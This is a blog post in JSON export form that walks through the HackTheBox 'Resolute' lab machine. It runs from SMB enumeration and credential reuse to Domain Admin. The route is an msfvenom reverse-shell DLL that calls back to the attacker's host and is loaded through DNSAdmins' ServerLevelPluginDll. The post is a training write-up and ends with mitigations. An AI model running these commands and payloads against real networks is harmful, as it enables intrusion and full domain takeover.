{"id":249,"date":"2020-05-31T18:10:37","date_gmt":"2020-05-31T18:10:37","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=249"},"modified":"2020-05-31T18:10:38","modified_gmt":"2020-05-31T18:10:38","slug":"hackthebox-resolute-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-resolute-walkthrough\/","title":{"rendered":"Hackthebox: Resolute Walkthrough"},"content":{"rendered":"\n<p>Hey fellow hackers!<br>\nThis post will guide you through owning Resolute from Hackthebox.<\/p>\n\n\n\n<p>Resolute is an easy-rated machine. The box has a very straightforward initial foothold, but owning the administrator is a bit tricky.<br>\nIt depicts another instance of an AD group membership privilege escalation.<\/p>\n\n\n\n<p>So let\u2019s get started!!<\/p>\n\n\n\n<p>Run an nmap scan to find the open ports and the services running on them.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># nmap -sC -sV -oA resolute.nmap 10.10.10.169<\/pre>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/_8DZa56VpRRV1fyPgjmOdmNfecin5qnwbnbOef3yR7sTL911LIg-nhnS3MDnEVkauaZy5dA9X128Tolr-VdfckLAFk5rvgRO-5phDo7rL_MPVypQpbnvjIXpKO7-pYMmC0ElmiJK\" alt=\"\" width=\"797\" height=\"349\"\/><\/figure>\n\n\n\n<p>The nmap results show several open services, including <strong>smb<\/strong> and <strong>ldap<\/strong>. The most useful one for us is smb, so let\u2019s do some basic enumeration.<\/p>\n\n\n\n<p>Since there were no public shares available, I ran <strong>enum4linux<\/strong> to enumerate users. And voila!! It found a lot of users. While going through the enumeration output, I saw that the user <strong>marko<\/strong> had his password written in his account description. An easy win!!<\/p>\n\n\n\n<p>I tried <a href=\"https:\/\/github.com\/Hackplayers\/evil-winrm\">evil-winrm<\/a> on the creds obtained, but it didn\u2019t seem to work. 
So I made a list of all the users and passed it through <b>crackmapexec<\/b>, and guess what? User <b>melanie<\/b> had the same password as marko!<\/p>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/NIQ63YiJsKfwBGLGcXRCs1fjSwx-mrSz71EaaVakX3OCUWRoMUNNz2TFoE6hUcsNMjbb_irLVs_dg9QkYUd1qjU3EHPpUMfWvkRxC1KtO4XHqiOcqjFJmszPhFayecn5BcRSk02b\" alt=\"\" width=\"877\" height=\"318\"\/><\/figure>\n\n\n\n<p>I tried <strong>evil-winrm<\/strong> again with melanie\u2019s creds, and yes, I got a user shell and read <strong>user.txt<\/strong> by running the commands<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!<br>\n# cd C:\\Users\\melanie\\Desktop<br>\n# type user.txt<\/pre>\n\n\n\n<p>Along with melanie, a user ryan was also present on the box, but I did not have access to that account. So let\u2019s find ryan\u2019s creds.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Finding the creds for ryan<\/h2>\n\n\n\n<p>After getting the user flag, I jumped over to C:\\ to enumerate further. I ran a dir but found nothing interesting.<\/p>\n\n\n\n<p>Then I added the -force switch to list hidden files too.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">> dir -force<\/pre>\n\n\n\n<p>And the command revealed a lot of hidden files.<img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/VaHwjVcwS6JVD_EJrj7UjDEqNGDqnEVvBRz0ZlHZWg4-xUNO7F16scAfoHoUQiQ2sQWzKX42FGtjbWTnzATO6y9t12zXTVLFyTa5aFRMoCYbSEHVRygIgJWKOgIbIAitUyBZph1z\" width=\"624\" height=\"360\"><\/p>\n\n\n\n<p>I looked into each file. 
The contents of <strong>PSTranscripts<\/strong> revealed something interesting: the creds of another user, ryan!!<\/p>\n\n\n\n<p>Note: according to the <a href=\"https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.host\/start-transcript?view=powershell-7\">Microsoft Docs<\/a>, a transcript records all or part of a PowerShell session in a text file. The transcript contains everything the user types along with the console output.<\/p>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/fFbIBf6bBfeB9XUFBuTDopx0wvAk4mHTqs-Ot2Z_DwnGMlIq_DRwJk_0-cLJzrQ0e5_AQJHG1-8YIW_ekTPh-fstN7x7EsYAHcfQrK5Ak_GAZvc4yPhwCez0L7bQu9QRA2pka3kB\" alt=\"\" width=\"721\" height=\"325\"\/><\/figure>\n\n\n\n<p>So I opened up another evil-winrm session with ryan\u2019s creds and ran whoami \/all.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!\n\n> whoami \/all<\/pre>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>\/all<\/td><td>Displays all information in the current access token, including the current user name, security identifiers (SID), privileges, and groups that the current user belongs to.<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/p8zgtslkPzdwJADOZxhlJtnReba9klXY6EneSn6csfusdphKEcx8lB6oWzs6snDh1wMayPJMEkAS6hUbvGmG4C5FAo1VXhjHFwmsBvqM10CntJkQTkRfFubTWIvhqD3g4bX5gABk\" alt=\"\" width=\"1001\" height=\"401\"\/><\/figure>\n\n\n\n<p>The output shows that ryan is a member of <strong>DNSAdmins<\/strong>, and membership of DNSAdmins can be abused to escalate to Domain Admin.<\/p>\n\n\n\n<p>This attack relies on loading a malicious DLL into the DNS service, which runs as SYSTEM on the DNS server. 
The DLL contains the reverse TCP shell code.<\/p>\n\n\n\n<p>According to the Microsoft protocol specification, the \u201c<strong>ServerLevelPluginDll<\/strong>\u201d operation lets us make the DNS server load a DLL of our choice (the DLL path is not verified).<br>\nWhen a DNSAdmins member runs dnscmd.exe (the utility for managing DNS servers) with this option, the following registry value gets populated:<br>\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\DNS\\Parameters\\ServerLevelPluginDll<\/p>\n\n\n\n<p style=\"background-color:#f8f1ef\" class=\"has-background\"><strong><a href=\"https:\/\/docs.microsoft.com\/en-us\/openspecs\/windows_protocols\/ms-dnsp\/c9d38538-8827-44e6-aa5e-022a016ed723\">ServerLevelPluginDll:&nbsp;<\/a><\/strong>An absolute pathname of a dynamic link library that the DNS server can use to resolve unknown names, or an empty string to remove or disable the previously selected DLL. This protocol only treats the pathname as a string, it does not constrain the syntax in any way.<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>As a very first step, a payload has to be created that gives us the reverse shell.<\/li><\/ol>\n\n\n\n<p>The payload (DLL) can be created using msfvenom as follows:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># msfvenom -p windows\/x64\/shell_reverse_tcp LHOST=10.10.14.160 LPORT=4444 --platform=windows -f dll &gt; plugin.dll<\/pre>\n\n\n\n<p>(Change LHOST to the IP of your attacking machine.)<\/p>\n\n\n\n<p>2.  
Now we have to set up an SMB server so that the payload (plugin.dll) can be served to the victim.<\/p>\n\n\n\n<p>There is a script <a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\/blob\/master\/examples\/smbserver.py\">smbserver.py<\/a> by impacket that can be used for this.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"># smbserver.py SHARE \/root\/Desktop\/htb\/resolute<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/3A__EW4YeIin6c7F8oF6WTXX3vT60iW8e3Zm_z--9xH68692lRtintOtH_3KEQ-6NzWx2a3bowsp-73Wu28pjZtugcDZ_iFbQ2Etuvj2bTMfx1quW1TPm0fk9vNYc8tAQg3vEnI1\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>SHARE<\/strong>: name of the share<br><strong>\/root\/Desktop\/htb\/resolute<\/strong>: path of the directory whose files you want to share over SMB<\/p>\n\n\n\n<p>To check whether the victim can reach the share, run<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">net view \\\\10.10.14.160 (your_smb_server_ip)<\/pre>\n\n\n\n<p>With the payload available on the share, the following command, run on the victim, points the DNS server at our payload.<\/p>\n\n\n\n<p>The DNS service then has to be stopped and started again so that <strong>plugin.dll<\/strong> (the payload) is loaded.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># dnscmd.exe \/config \/serverlevelplugindll \\\\10.10.14.160\\SHARE\\plugin.dll<br># sc.exe stop dns<\/pre>\n\n\n\n<p>Open up a netcat listener on the attacking machine:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># nc -lnvp 4444<\/pre>\n\n\n\n<p>And then run the following command on the target machine:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># sc.exe start dns<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 
src=\"https:\/\/lh6.googleusercontent.com\/hTTVzGLn3Mi2znOXNWMbTRWTerJ_DuH1HaksVAl-WIcd_xnld8SrXfiTjP6lW9bzqvfXxPGmJhoZb-zmIzNEbdEzhQWoLiAz5qytWJ_kF24nLL-G9hUIDMWg7VQYyPL6E2pxPrbh\" alt=\"\"\/><\/figure>\n\n\n\n<p>As the malicious DLL gets loaded by the DNS server, we get a shell.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/ioLx7hVQMB7Ilb7jOjc8C7G7Jx_aeWhhhKsAfQ0dWYhmj4nqGKdxEYcftw6FOEvhmLiruYeKsCEpq_BGHkorpSZPQdJPuNgtWqnW6lC9ZxJG-FXFpgHQe9mD1GXLoSLR6I_t6HBT\" alt=\"\"\/><\/figure>\n\n\n\n<p>And we are <strong>Administrator!!<\/strong><\/p>\n\n\n\n<p>root.txt can be found at <strong>C:\\Users\\Administrator\\Desktop\\root.txt<\/strong><\/p>\n\n\n\n<p>Looking for mitigations for the vulnerable scenarios above?<br> Here is what you should do!!<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>AD user passwords <strong>should not<\/strong> be stored in the account description when the user is created.<\/li><li><strong>PSTranscripts<\/strong>, where we found ryan\u2019s creds, should be readable only by administrators.<\/li><li>To prevent privilege escalation from DNSAdmins to Domain Admin, only <strong>administrators<\/strong> should be <strong>members<\/strong> of DNSAdmins.<\/li><li>Only privileged computers\/groups should be able to access the Domain Controller over RPC.<\/li><li>Regularly review the DNS server object permissions for any group\/account that shouldn\u2019t have privileged access.<\/li><\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Hey fellow hackers! This post will guide you through owning Resolute from Hackthebox. Resolute is an easy-rated machine. The box has a very straightforward initial foothold, but owning the administrator is a bit tricky. It depicts another instance of an AD group membership privilege escalation. So let\u2019s get started!! 
Run the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":259,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_col
or_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2,109],"tags":[117,118,102,26,54,120,108,100,101,52,116,114,113,119,57],"class_list":["post-249","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","category-windows","tag-dnsadmin","tag-domain-admin","tag-hacking","tag-hackthebox","tag-htb","tag-impacket","tag-information-security","tag-infosec","tag-pentest","tag-red-teaming","tag-resolute","tag-samba-share","tag-smb","tag-smbserver","tag-windows","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/249"}],"collection":[{"hr
ef":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=249"}],"version-history":[{"count":10,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/249\/revisions"}],"predecessor-version":[{"id":262,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/249\/revisions\/262"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/259"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=249"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=249"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=249"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}